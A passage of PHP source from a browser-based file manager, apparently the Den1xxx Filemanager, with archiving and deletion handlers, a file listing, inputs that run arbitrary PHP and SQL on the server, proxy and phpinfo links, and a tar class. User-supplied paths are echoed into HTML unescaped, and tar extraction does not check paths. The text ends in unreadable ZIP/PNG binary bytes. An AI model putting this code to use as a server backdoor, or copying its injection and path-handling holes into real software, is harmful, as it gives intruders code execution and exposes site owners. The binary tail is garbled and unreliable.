href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg)){ ?> <tr> <td colspan="2" class="row2"><?=$msg?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } PK R��Z�f�A� � logo.pngnu W+A�� �PNG IHDR � d Æ pHYs � ��+ �IDATx^�] X���U� ��2\S�@3++3��PÍ\H-��i�{&���KY��R3?M�pCqGE1A�w�w�r_|���y��|ϙ�y�9sΙ�̙�̙A��D� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@� !@�PʪSx`]����&|)z�=�U^qx���x�������ժ�����%�SV��P����m��BAcx����kch�a[?U��2F�K)���4z ��םa`��e �'����룑�:[,|�g|E��:9�_���;y��52kP�;��^�75rٱ3�������q���W���g�&k[��ɬ`�U��q%;�걌['}zy��K�ʕ%Џ��ůO�6���54udY�.�+-S� g?�oHz�u)re���e���h0g �0.^��8亮�6s��7��u��=�c�~Oq������;k?u'ޘxr��_E˭ϼ���7����+������^�|��.��7z��p��MX��A��>.��R(WwIz�J��KI *��Sl�T�'j����o)-++��$�QAك�����w o�dnK:�!�ߍ�vƻ�E�8���^�zx�7E���ʭO��۔��J�K:�\�b�O�< ��ͩ {Ce��J�lV�6���r��<,��|�r.3���/��g���}�m3��|�!#A�}x^��g#ŹH�4��F�ʷ��+�YKe�� !Y[��ĵ�+��s��Rg� ��yx�3S�QaV�b�����U�O/��J+#�U�H�#���O�~ѫ�G{�\��5HYiE�S�* �����B"ߌ^��.��Y F���GklO����Hy�bBgez�2��e 5NN0�&����b�S�Q�D>���^�yW�@��y�E��vO��~��v����3�G�g����� *�oK�6!�|%�'�0k���E &�e t��Ҟkf���3�`���Ֆt�K�=����ǒ������ݟnr�h��Ҝm��%1�[Z��:��<��)���L���L��������d��l��\|?��]��=�.��K�E'��+'6����{���b7s�n-i9hV<T#ֺ _KY#�WW>�M��[�\7 �AHyn�k��[lm����xS��n�7�21��o}aN[�:�{��3� �>�Ћhy�@�����ȦÜ���I��6���l� _.|̍�=��� ���Y�����5Ĵ)S�A�;�at��l�zL(l�d-���J�K�@w���}-eg3��|���|B�#�e���ȼG�T��Y����~Ӗ+��0���^,X^<.HK��b.x�N�fͿ�na7�W���.�J���d��&���#�5kSf��w&�Vvi�3� �s�9�9B�A�>=3m&�ƹ�h�����ҭ7;l ��� |���M�5~H�؏��X>��6al���Y\̌;�Ï�$d$ύ�?�c�|mް�� �����i��Nf�9�SG8�7﷼|�ܒ�l8�i��ܼ~op�aFb�5|����0.�N!_��śouj�UjQ����e;�W�@e��d��ה��\��}�����i�7�$�0+���`6CI��wvL�*.�O8���Tz�R��'�6%�\��w��ͣ�( ��` �xy�鎧�:��d0ƻ�@0f�|f��Soۀ�,�d���!�(L}��s�n���@�b�@�u#ϥ똢,��m#0��"���O���3�l�_�|X�,|thoh�e�8�}��w<�u�||{���d(���3 ��,�f!^�OgĞ����Z�_7P d&D�zOTY���͜���b�Fx��Xߣ'��:�5����k�埿i����}��ᴘ�0�ml�=��x_�N�����_�rȢ��]% 5�v�>�<r%��Ҽ=���m�Վ���%�J��+X���l�v�h�6'h�e�w?�*UXV�]A�h����,�/�zo�����H��s8�A�s��Q��_$!�L�\(Q���÷n#��,\t��&r\�<��$�)�{���lT�Y������嚺���O��~ZG�����U���1$��w�_jkn�n�V�st��.�c�ڝ�Įw�6�vh�e)=֤b����{/���$b=V�����J���@�R��0���@̺t���y:������N'd6�&�~��-@O����;6'�Z[�7��Y�ڬ���R$�(���7�@���4��z��� y����8�����w������B��`ͩؖ|v?)�mO"�b<�X���P�IW�{�$q�)-��(�M��B\����@�&�6 N����N�cxryVR|�c�0;6��ԮC��O�n��)���;�u�U��܋k��)`��X�l иk܆����˙ �>���Mp����K~�{)�7*]����(����t� �Ğ������O�<�҈pg���~u���^��;<�g�\�]'��H�k)�`���Nsb��a��n�V�Nm!6�w��/4 ����X�q�Zh���=G����[�6dw$���+ o~t��-ܷh!���p��ی ϸs@�7lH��_]�ES� ��Ր��5]���j�-e�0�o���?�>�'�dMp�S�j�ˠīV3��F�h�4[1�^YnX'��l��L��)0�OQ^.�u���vb�Ω�`��:��>z � g8��NRU0}�0�v��� R&���ؕr�W�aAYq�ԋ[�*8�~���3X� �L��H�l1Wc������)� w����A EpU�F��1�g�9(/�f�BC�� �%ͽ����?���� ��s��܃���S̏9U���������R{�/eK!��g�6�� +�S�sIK����7�l�ܨ��N��u\ʊ�� �v�J�$A���@� 3j�p�V[')�1R�rb�?��-*�q�T�f5yg6�<`�e�F�/�\o�p�ׇۃ#C�z�K>[�v%�VW;�D.�$+ǻ�̡�_8x�%�e p��mA��G��T1)v���e^Yz������1����%�4^)�=��,Y�`�`|�)} �v�[��i�`�O�ˋ|����]��H*|�x��4浪��=9�VJ��� Z�sm�;H5L6X��o pX^��6���*Eu�5�U:�0���Ԗ�m/M�f��J,�Hq��L/p�W6ై+�s\2��۾��b�L9,��Q����N�t������O�P�_`Y�Aړr�E��Mpd`{]+����#��?���!&���ԯ�a�-:��b�%�C��1=x�a�� �Ӳ��� �� 9e���3���Cc��O�6�p�������x� ν��U~Y����a Mx���[]����=��O���<�SNN �V�~!�rr`����bAa,���9��${+z���b�x&�� �G�+��`�X~�K!^'�Z3�V�r)��:]�}�W�-�U��I�N����u�`�<�)��J;���ɶY��1]5r�lM�^�a?�A�b�U܁9��`��0��MLϵĚ��ݹ0����,��~��0:���Yq���묬�G�;vl�V�c��1�Eٵ��_=r�3z������R�Iޅq��m�;�PG��Z����ſ��^P8���A_�?ι��5h�CPnYڄ���zq����o��$�FV5�O�1:,?������0��oN��?M���������@ԯvHK���I/���enJQֿ�Gٝl��o0��V�-[�Ru}?f� =�d������Q��ˢ~�S*-x�G0��<��x�J���Yh� _�ïʨ w<6����8�^p��^�|�ʽS���m����҂��^N4&��r�%u�%^/ػ��TP�,x˪�8S@jҺU�+R���� �|�U4&'����5Z����;��.�#�=����w��G���U���݆��Q��~X�[�I��j?��:� ����vҾ�Ϯ���|Y�Nα�U��e4=?K��CR^�\��6�iy��B�^ t�<v�*�����.�׆� Ǵ�t�U}Ѵ���Wn1S�������.����;ص/��>����G��F�9�ޮi �^vz�0��+��+���:z���X�Ƹ�=�0X)��0����`��;��p���Cǣ�s�0�i�j������;� Y�V��8'��F��7rs������m8��b�"�(vkM�cw}«���8�gڂ��U�x�V��j���j�Φ(sT�����b��xWԭ��7�U~�Z|�;��^�l$WL>�\���i¨��$��g��?�+v�����٘7&�����<����dۙ[Մ�����B��"a���N��o�1w����4:�P�+�BqF<���ޭ�LY����!��eL��f�M,0���9����6|��C�����~��&bM�E�������� z��z��o���Ҭ^�iZQN tF�T���js#71�W�>k�rP&�nt�(�ytX��Nֵ�p�S��b�f�6�5u�]��~���z�WT���l�X� �c�lob�֗����&��1��W� 96"wi���Z��W��ik�H��W���ps�2Y2*�4�r�0)a��{�!6��Ţ�Y��n⺫s�$W-R���M��9�Qŵ��T��-��+���1��IWnM:�M���T����'��;�3��d��0f��#!2�FGM-~��`�jvpGݜ�5�0�u� ��� 